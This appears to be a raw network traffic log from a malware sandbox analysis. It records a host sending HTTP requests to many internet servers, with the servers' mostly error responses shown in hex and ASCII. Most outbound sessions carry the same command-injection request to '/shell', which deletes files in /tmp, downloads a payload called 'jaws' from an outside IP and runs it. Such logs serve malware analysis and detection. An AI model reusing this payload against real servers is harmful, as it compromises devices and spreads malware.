                                                          22192.168.2.23480945.133.222.13680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.610662937 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:55.816864014 CET525INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:23:55 GMT
                                                          Server: Apache
                                                          Content-Length: 347
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          23192.168.2.2346956160.121.60.20580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.701184034 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:52.041759014 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:23:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          24192.168.2.235191249.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.889385939 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 33 3a 35 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:23:51Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          25192.168.2.235220454.211.17.19080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.955509901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:52.113957882 CET613INHTTP/1.1 505
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Language: en
                                                          Content-Length: 465
                                                          Date: Tue, 02 Jan 2024 05:23:51 GMT
                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 35 30 35 20 e2 80 93 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 35 30 35 20 e2 80 93 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 505 HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505 HTTP Version Not Supported</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          26192.168.2.2354666104.81.147.8680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.956423998 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:52.116126060 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:23:52 GMT
                                                          Date: Tue, 02 Jan 2024 05:23:52 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 65 37 35 31 39 62 38 26 23 34 36 3b 31 37 30 34 31 37 33 30 33 32 26 23 34 36 3b 34 34 30 34 63 64 63 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9e7519b8&#46;1704173032&#46;4404cdc0</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          27192.168.2.2332814149.57.79.10280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.958904028 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:52.121129036 CET419INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:23:52 GMT
                                                          Server: Apache/2.4.6 (CentOS)
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          28192.168.2.2345040108.186.216.18180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:51.959819078 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          29192.168.2.235519867.207.70.10080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:52.032968998 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:52.268533945 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.21.6
                                                          Date: Tue, 02 Jan 2024 05:23:52 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          30192.168.2.2360376116.203.70.2880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:52.035634995 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:52.274471998 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:23:52 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          31192.168.2.2339152185.124.143.18880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:52.102637053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:52.371798992 CET516INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html
                                                          Content-Length: 349
                                                          Connection: close
                                                          Date: Tue, 31 Aug 2021 07:32:07 GMT
                                                          Server: lighttpd/1.4.39
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          32192.168.2.235196449.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:52.552789927 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 33 3a 35 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:23:51Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          33192.168.2.235198649.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:53.204407930 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 33 3a 35 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:23:52Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          34192.168.2.235200249.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:53.944802999 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 33 3a 35 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:23:53Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          35192.168.2.2348022125.229.151.23980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:54.655328989 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:54.964586020 CET534INData Raw: 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 36 31 38 62 37 62 63 36 2d 35 37 64 38 2d 33 62 37 39
                                                          Data Ascii: 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1 404 Not FoundServer: 618b7bc6-57d8-3b79-4fbf-da29de899e97Date: Tue, 02 Jan 2024 05:12:51 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: close<HTML><HEAD


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          36192.168.2.233412038.181.35.21980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:54.670610905 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:54.973754883 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:23:54 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          37192.168.2.235201449.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:54.716609955 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 33 3a 35 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:23:54Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          38192.168.2.234505418.155.199.10580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:54.818569899 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:54.978420973 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:23:54 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          39192.168.2.2351226108.186.100.20980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:54.821480989 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          40192.168.2.2338734185.164.6.4880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:54.914292097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:23:55.173170090 CET509INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:23:55 GMT
                                                          Server: Apache/2.4.18 (Ubuntu)
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
